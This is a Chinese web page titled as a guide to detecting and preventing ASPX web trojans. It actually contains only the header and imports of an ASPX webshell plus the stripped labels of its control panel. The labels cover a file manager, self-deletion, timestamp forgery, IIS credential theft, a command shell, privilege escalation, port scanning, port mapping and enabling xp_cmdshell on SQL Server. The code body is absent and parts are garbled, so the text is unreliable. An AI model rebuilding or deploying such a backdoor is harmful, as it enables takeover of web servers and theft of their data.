aspx超强木马查杀与防范(web网马)

复制代码 代码如下:

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Diagnostics"%>
<%@ import Namespace="System.Data"%>
<%@ import Namespace="System.Management"%>
<%@ import Namespace="System.Data.OleDb"%>
<%@ import Namespace="Microsoft.Win32"%>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Runtime.InteropServices"%>
<%@ import Namespace="System.DirectoryServices"%>
<%@ import Namespace="System.ServiceProcess"%>
<%@ import Namespace="System.Text.RegularExpressions"%>
<%@ Import Namespace="System.Threading"%>
<%@ Import Namespace="System.Data.SqlClient"%>
<%@ import Namespace="Microsoft.VisualBasic"%>
<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

复制代码 代码如下:

Password:

☆�����x___Ёnd

| | | | | | | | | | | | |

<%--FileList--%>     当前目录 :  文件(夹)名最后修改时间大小操作 | 木马目录 | 新建目录  | 木马自杀 <%--FileEdit--%> 当前文件（创建新的文件名和新文件） DefaultUTF-8 文件内容 <%--CloneTime--%> 修改文件 参考文件 设置最后修改时间 » 当前文件       创建时间 : 最后修改时间 : 最后访问时间 : <%--IISSpy--%> IDIIS_USERIIS_PASSDomainPath <%--Process--%> IDProcessThreadCountPriorityAction <%--CmdShell--%>   Cmd路径:      语句:       <%--Services--%> IDNamePathStateStartMode <%--Sysinfo--%> <%--UserInfo--%> <%--SuExp--%>                         用户名 : 密码 : 端口 : CmdShell  :  <%--Reg--%> 注册表路径 : KeyValue <%--PortScan--%> IP : 端口 : <%--DataBase--%> 语句 : MSSQLACCESS Please select a database : SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtreeSP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup Run SQL <%--PortMap--%> 本地Ip : 本地端口 : 远程Ip : 远端口程 : <%--Search--%> 关键词 使用正则表达式 替换 替换 搜索文件类型 文件名称文件内容 路径 File PathLast modifiedSize

Copyright © 2009-2012 ON-e.cn All Rights Reserved.